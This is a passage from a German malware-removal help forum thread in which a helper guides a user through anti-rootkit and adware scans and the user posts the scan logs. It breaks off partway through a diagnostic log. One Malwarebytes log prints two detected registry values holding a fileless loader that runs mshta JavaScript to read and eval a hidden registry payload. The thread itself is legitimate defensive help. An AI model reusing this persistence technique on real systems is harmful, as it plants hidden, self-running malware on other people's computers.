(08/06/2017 12:22:46 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:22:31 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Systemfehler: ============= Error: (08/06/2017 01:13:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. Error: (08/06/2017 01:11:46 AM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/06/2017 01:11:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/06/2017 01:08:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. Error: (08/06/2017 01:06:31 AM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/06/2017 01:06:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. CodeIntegrity: =================================== Date: 2017-07-28 18:15:03.249 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-28 18:15:02.562 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-05 21:28:31.069 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-20 13:12:31.840 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-06 20:55:49.642 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:43:22.953 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:06:11.606 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:40:43.841 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:18:44.959 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16279.21 MB Verfügbarer physikalischer RAM: 13164 MB Summe virtueller Speicher: 18711.21 MB Verfügbarer virtueller Speicher: 15354.91 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:70.63 GB) NTFS Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.44 GB) NTFS Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.95 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=449 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ============================ |
07.08.2017, 10:47 | #20 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet Malwarebytes Anti-Rootkit (MBAR) Downloade dir bitte Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers Lesestoff: Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit. Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ Logfiles bitte immer in CODE-Tags posten |
07.08.2017, 18:57 | #21 |
| UPC meldet: Virus, würmer werden über meine IP versendet Da hat ihm was in der Registrierung nicht gepasst... Code:
ATTFilter Malwarebytes Anti-Rootkit BETA 1.9.3.1001 www.malwarebytes.org Database version: main: v2017.08.07.08 rootkit: v2017.08.02.01 Windows 10 x64 NTFS Internet Explorer 11.483.15063.0 **** :: SILENTDRAGON [administrator] 07.08.2017 19:29:32 mbar-log-2017-08-07 (19-29-32).txt Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 302574 Time elapsed: 10 minute(s), 8 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 2 HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\QOFQOW\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5B53A\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d] Registry Values Detected: 2 HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\qofqow\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5b53a\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d] Registry Data Items Detected: 0 (No malicious items detected) Folders Detected: 0 (No malicious items detected) Files Detected: 0 (No malicious items detected) Physical Sectors Detected: 0 (No malicious items detected) (end) Code:
ATTFilter Malwarebytes Anti-Rootkit BETA 1.9.3.1001 www.malwarebytes.org Database version: main: v2017.08.07.08 rootkit: v2017.08.02.01 Windows 10 x64 NTFS Internet Explorer 11.483.15063.0 ***** :: SILENTDRAGON [administrator] 07.08.2017 19:45:23 mbar-log-2017-08-07 (19-45-23).txt Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 301793 Time elapsed: 8 minute(s), 10 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 0 (No malicious items detected) Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 0 (No malicious items detected) Folders Detected: 0 (No malicious items detected) Files Detected: 0 (No malicious items detected) Physical Sectors Detected: 0 (No malicious items detected) (end) |
07.08.2017, 21:41 | #22 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet Adware/Junkware/Toolbars entfernen Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop! Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren! 1. Schritt: adwCleaner v7.0.1.0 Downloade Dir bitte AdwCleaner auf deinen Desktop (Bebilderte Anleitung).
2. Schritt: JRT - Junkware Removal Tool Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
__________________ Logfiles bitte immer in CODE-Tags posten |
07.08.2017, 23:00 | #23 |
| adwcleaner_7.0.1.0 SCANCode:
ATTFilter # AdwCleaner 7.0.1.0 - Logfile created on Mon Aug 07 21:51:40 2017 # Updated on 2017/05/08 by Malwarebytes # Running on Windows 10 Home (X64) # Mode: clean # Support: https://www.malwarebytes.com/support ***** [ Services ] ***** No malicious services deleted. ***** [ Folders ] ***** Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare Deleted: C:\Users\*****\AppData\LocalLow\IObit\Advanced SystemCare Deleted: C:\Users\*****\AppData\Roaming\IObit\Advanced SystemCare Deleted: C:\Users\*****\AppData\Local\YSearchUtil Deleted: C:\ProgramData\IObit\ASCDownloader Deleted: C:\Users\All Users\IObit\ASCDownloader Deleted: C:\ProgramData\GPCWValidator Deleted: C:\Users\All Users\GPCWValidator Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Deleted: C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A} Deleted: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705} Deleted: C:\ProgramData\{EAAB5A83-3809-4B0E-83A6-E4B0DBF2157E} Deleted: C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98} ***** [ Files ] ***** Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Deleted: C:\Users\All Users\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Deleted: C:\Windows\System32\lavasofttcpservice.dll Deleted: C:\Windows\SysWOW64\lavasofttcpservice.dll Deleted: C:\Windows\SysNative\LavasoftTcpService64.dll Deleted: C:\Windows\Reimage.ini ***** [ DLL ] ***** No malicious DLLs cleaned. ***** [ WMI ] ***** No malicious WMI cleaned. ***** [ Shortcuts ] ***** No malicious shortcuts cleaned. ***** [ Tasks ] ***** No malicious tasks deleted. ***** [ Registry ] ***** Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC Deleted: [Key] - HKLM\SOFTWARE\ussc-pr Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484} Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4} Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546} Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36} Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A} Deleted: [Value] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10 Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief. Deleted: [Key] - HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief. Deleted: [Key] - HKLM\SOFTWARE\Reimage Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Reimage Deleted: [Key] - HKCU\Software\Reimage Deleted: [Key] - HKLM\SOFTWARE\Auslogics ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries deleted. ***** [ Chromium (and derivatives) ] ***** Plugin deleted: MSN Homepage & Bing Search Engine - ************************* ::Tracing keys deleted ::Winsock settings cleared ::Prefetch files deleted ::Proxy settings cleared ::IE policies deleted ::Chrome policies deleted ::Additional Actions: 0 ************************* C:/AdwCleaner/AdwCleaner[C1].txt - [7019 B] - [2015/11/3 1:16:48] C:/AdwCleaner/AdwCleaner[S1].txt - [4242 B] - [2015/11/3 1:16:24] ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ########## Code:
ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Malwarebytes Version: 8.1.4 (07.09.2017) Operating System: Windows 10 Home x64 Ran by **** (Administrator) on 07.08.2017 at 23:57:46,77 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 10 Successfully deleted: C:\ProgramData\pdfforge (Folder) Successfully deleted: C:\ProgramData\productdata (Folder) Successfully deleted: C:\Users\****\AppData\Roaming\productdata (Folder) Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (****) (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\StartMenu8_Start (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_Install_Martin_W (Task) Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Martin_W (Task) Successfully deleted: C:\WINDOWS\Tasks\StartMenu8_Start.job (Task) Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_W.job (Task) Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_W.job (Task) Registry: 1 Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 07.08.2017 at 23:58:47,94 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
07.08.2017, 23:09 | #24 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet Okay, beide Tools bitte zwecks Kontrolle wiederholen.
__________________ Logfiles bitte immer in CODE-Tags posten |
08.08.2017, 17:03 | #25 |
| UPC meldet: Virus, würmer werden über meine IP versendet Ok hier nochmal adwcleaner Code:
ATTFilter # AdwCleaner 7.0.1.0 - Logfile created on Tue Aug 08 15:59:40 2017 # Updated on 2017/05/08 by Malwarebytes # Running on Windows 10 Home (X64) # Mode: clean # Support: https://www.malwarebytes.com/support ***** [ Services ] ***** No malicious services deleted. ***** [ Folders ] ***** No malicious folders deleted. ***** [ Files ] ***** No malicious files deleted. ***** [ DLL ] ***** No malicious DLLs cleaned. ***** [ WMI ] ***** No malicious WMI cleaned. ***** [ Shortcuts ] ***** No malicious shortcuts cleaned. ***** [ Tasks ] ***** No malicious tasks deleted. ***** [ Registry ] ***** No malicious registry entries deleted. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries deleted. ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries deleted. ************************* ::Tracing keys deleted ::Winsock settings cleared ::Prefetch files deleted ::Proxy settings cleared ::IE policies deleted ::Chrome policies deleted ::Additional Actions: 0 ************************* C:/AdwCleaner/AdwCleaner[C1].txt - [1456 B] - [2015/11/3 1:16:48] C:/AdwCleaner/AdwCleaner[S1].txt - [1079 B] - [2015/11/3 1:16:24] ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ########## Code:
ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Malwarebytes Version: 8.1.4 (07.09.2017) Operating System: Windows 10 Home x64 Ran by Martin W*** (Administrator) on 08.08.2017 at 18:04:00,30 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 1 Successfully deleted: C:\ProgramData\productdata (Folder) Registry: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 08.08.2017 at 18:05:00,48 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Code:
ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Malwarebytes Version: 8.1.4 (07.09.2017) Operating System: Windows 10 Home x64 Ran by Martin W*** (Administrator) on 08.08.2017 at 18:08:32,26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 0 Registry: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 08.08.2017 at 18:09:26,98 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Geändert von Lost_Viking (08.08.2017 um 17:12 Uhr) |
08.08.2017, 22:02 | #26 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet Ich brauche neue FRST-Logs . Haken setzen bei addition.txt dann auf Untersuchen klicken.
__________________ Logfiles bitte immer in CODE-Tags posten |
09.08.2017, 18:06 | #27 |
| FRSTCode:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017 durchgeführt von *** (Administrator) auf SILENTDRAGON (09-08-2017 18:59:08) Gestartet von C:\Users\***\Desktop Geladene Profile: *** (Verfügbare Profile: ***) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: Chrome) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe (Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe (Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.) HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.) HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.) HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation) Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1986280 2017-07-07] (TomTom) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\***\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\***\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\***\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\***\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\***\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\***\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 ManualProxies: Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q= HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/ BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei BHO-x32: Java(tm) Plug-In SSV Helper -> 